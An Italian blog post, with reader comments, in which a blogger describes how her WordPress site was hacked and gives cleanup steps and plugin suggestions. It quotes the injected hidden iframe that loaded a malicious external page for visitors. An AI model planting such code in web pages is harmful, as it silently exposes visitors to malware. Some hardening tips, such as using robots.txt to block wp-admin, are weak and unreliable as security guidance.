Ecco come mi hanno hackerato il blog
IL FATTACCIO
Ho sempre dato scarso peso alla sicurezza del mio blog. Leggevo con interesse riguardo a plugin e precauzioni per tenerlo al sicuro, ma poi pensavo: “Ma figurati se un hacker viene nel mio blog che è piccolino e nato da poco. Gli hacker non se lo inculano il mio blog!”
Detto fatto. Oggi pomeriggio digito il mio url e mi compare un messaggio dell’antivirus (grande NOD32 ti amerò per sempre) che mi dice che il sito contiene un trojan e per sicurezza è stato bloccato. Eh??
Provo a fare un altro tentativo ma niente, l’antivirus continua a bloccare imperterrito. Però mi accorgo anche del fatto che quando tento di accedere al mio url, prima che l’antivirus lo blocchi, avviene una sorta di redirect verso uno strano indirizzo.
Allarmata e sconcertata mi rivolgo all’assistenza del mio hosting che, lesti e professionali come sempre, nel giro di cinque minuti mi confermano l’hackeraggio tramite un iframe e mi segnalano due file modificati nella cartella wp-includes di WordPress.
Da quello che ho capito informandomi sul web, l’hacker ha sfruttato una falla PHP piuttosto comune e ha inserito il seguente codice nel file default-widgets.php:
1 | <iframe src="http://filmproductionlifemedia.cn:8080/ts/in.cgi?pepsi73" width=125 height=125 style="visibility: hidden"></iframe> |
In questo modo si apriva una pagina infetta in un iframe situato nella parte alta del mio blog e nascosto agli occhi degli utenti dall’attributo hidden. Fortunatamente il mio antivirus me l’ha prontamente segnalato e me ne sono accorta subito, ma lo scopo di questo tipo di hack è appunto quello di passare inosservato.
Se volete accertarvi che anche il vostro blog non vi riservi spiacevoli sorprese controllatelo con questo ottimo tool online: Unmask Parasites.
LA PULIZIA
Se a qualcuno capitasse o fosse capitata la stessa cosa ecco come ripulire il vostro blog:
- Innanzi tutto una bella scansione anti-virus e anti-malware del pc su cui stiamo lavorando perchè c’è la possibilità che l’hacker sia riuscito a raggiungere anche il vostro computer.
- Una volta che avrete verificato che il pc è pulito cambiate la password FTP.
- Ora potete sostituire i file manomessi con quelli della vostra copia di backup (perchè voi la tenere sempre di scorta una copia di backup vero?!) oppure cancellare le righe aggiunte.
- Rifare una scansione del sito con Unmask Parasites.
- Accertatevi, sempre tramite Unmask Parasites (accanto alla voce Google cliccate il link details) che Google non si sia accorto della vostra infezione. Nel caso l’avesse scoperta richiedete una revisione attraverso il pannelo di Strumenti per i webmaster
LE PRECAUZIONI
Ora che avete ripulito tutto per benino, oppure se non vi siete mai posti il problema che un hacker possa incasinare il sito anche a voi, è giunto il momento di pensare col senno del poi ed installare qualcuno tra i seguenti plugin:
- WordPress DB Backup: Già dal primo istante in cui avete installato il vostro blog WordPress avreste dovuto dotarlo di un plugin per il backup automatico. Se così non fosse però vi consiglio questo che è ottimo e vi permette di ricevere la vostra copia direttamente via email.
- WordPress file monitor: Di vitale importanza in casi come il mio, questo plugin vi segnala se sono stati modificati dei file e quali.
- WP Security Scan: Scansiona il vostro blog alla ricerca di vulnerabilità nella password, nei permessi e nel database. Utilissimo.
- WordPress Firewall Plugin: Il nome dice tutto, un firewall per il vostro blog. Da provare.
- AskApache Password Protect: Questo plugin aggiunge un secondo strato di sicurezza impostando una password anche per la cartell wp-admin. Funziona scrivendo nel file .htaccess e cripta le password in .htpasswd.
- Semisecure Login: Per aumentare la sicurezza nel processo di login al blog, questo plugin usa una cifratura MD5 della password e funziona tramite javascript.
E per finire in bellezza l’opera applichiamo questi due trucchetti segnalati da Guadagnare con un blog:
- Mettete un file index.html in bianco nella cartella /plugins: Questa cartella infatti è accessibile in alcuni casi digitando nomedominio/wp-content/plugins. In questo modo si bloccherà l’accesso facendo visualizzare solo una pagina bianca.
- Bloccate l’accesso a la cartella /wp-admin: Si può fare aggiungendo questa linea di codice al file robots.txt (potete crearlo voi e metterlo nella cartella principale del blog):
1
Disallow: /wp-admin/
Cara Lili, faremo tesoro della tua esperienza! Questi attacchi sono sempre in agguato.
Almeno è servito a qualcosa allora dai
Comunque l’errore è stato in primo luogo mio che ho sottovalutato il fattore sicurezza. Da oggi in poi il mio WordPress sarà una botte di ferro 
@mazzjoe: Ma il tema è mio, me lo son costruita da zero…spero proprio che non sia malevolo
Grazie per aver condiviso la tua esperienza!! Ho del groviera da trasformare al più presto in botte di ferro! Proverò alcuni dei plugin che hai suggerito, grazie ancora! Ciao
Non conoscevo il sito Unmask Parasites… ottima dritta. Ma se al posto della index bianca nella cartella plugins metto una index con una frase un po cattivella succede qualcosa?
A parte gli scherzi sono tutti ottimi consigli
@Fabiola: Se questa esperienza può senrvire a sensibilizzare i blogger a stare più accorti riguardo alla sicurezza, forse è stata fin positiva
@Nashis: Non ci avevo pensato a costruire una pagina con un messaggio
Bella idea bravo, domani mi ci metto. ihihi
Azz, domani mi mobilito per sistemare la sicurezza del mio blog.
Grazie per la dritta Liliansi!
[...] Ecco come mi hanno hackerato il blog [...]
Post utilissimo!
Mi spiace che per scriverlo tu abbia dovuto smadonnare sulla tua stessa pelle, però vedo che te la sei cavata egregiamente
Roberto
@Postoditacco: Eh ma il merito è dei ragazzi di Hosting per Te…senza di loro ci avrei messo mesi per capire quali file erano stati hackerati
Cmq guardo il lato positivo…ho imparato una lezione. Alla fine poteva andarmi molto peggio 
Buono a sapersi in ogni caso: se deciderò di cambiare hosting, ne terrò sicuramente conto.
Per ora ho i miei domini su Aruba.
[...] capire e scovare il virus. Il tool online è Unmask parasites e se foste infettati date un occhiata qui. Segnala [...]
[...] un footer) del blog. A questo punto un rapido scambio di email con Francesco e recuperando un post di Dren di qualche tempo fa e archiviato dentro Delicious, metto in piedi una procedura che sembra [...]
E’ un articolo molto ben scritto! Per la sezione “precauzioni” penso che una protezione completa da attacchi non sia possibile ma ho trovato un sito http://www.ipsafer.com che permette di eseguire un controllo sugli IP, per sapere se sono pericolosi. Il servizio è GRATUITO e ci sono le istruzioni per modificare wordpress per eseguire il controllo stesso al momento dell’accesso.
@maspe: Non lo conoscevo! Grazie mille per la dritta
[...] sarà migliore grazie anche al vostro contributo. Last but not least, segnalo questo post su Dren, trovato proprio dopo l’accaduto. Magari c’è qualche indicazione che può tornarvi [...]
Windows è ….il più grosso virus in circolazione ….!
Almeno fate 3 cose:
- eliminate i “punti di ripristino” cosi non evitate di rirpistinare anche i virus!
- usate Windows come utente senza privilegi cioè guest invece di usarlo come Administtrator;
- passate a Linux distro “UBUNTU” c’è tanto sw ed è tutto GRATIS.
cIAO E BUONA NOTTE.
QUALE antivirus USI? (grande NOD32)
Ciao, Aldo
@ALDO: NOD32 appunto..l’ultimaversione l’ESET smart security che comprende anche firewall e anti-malware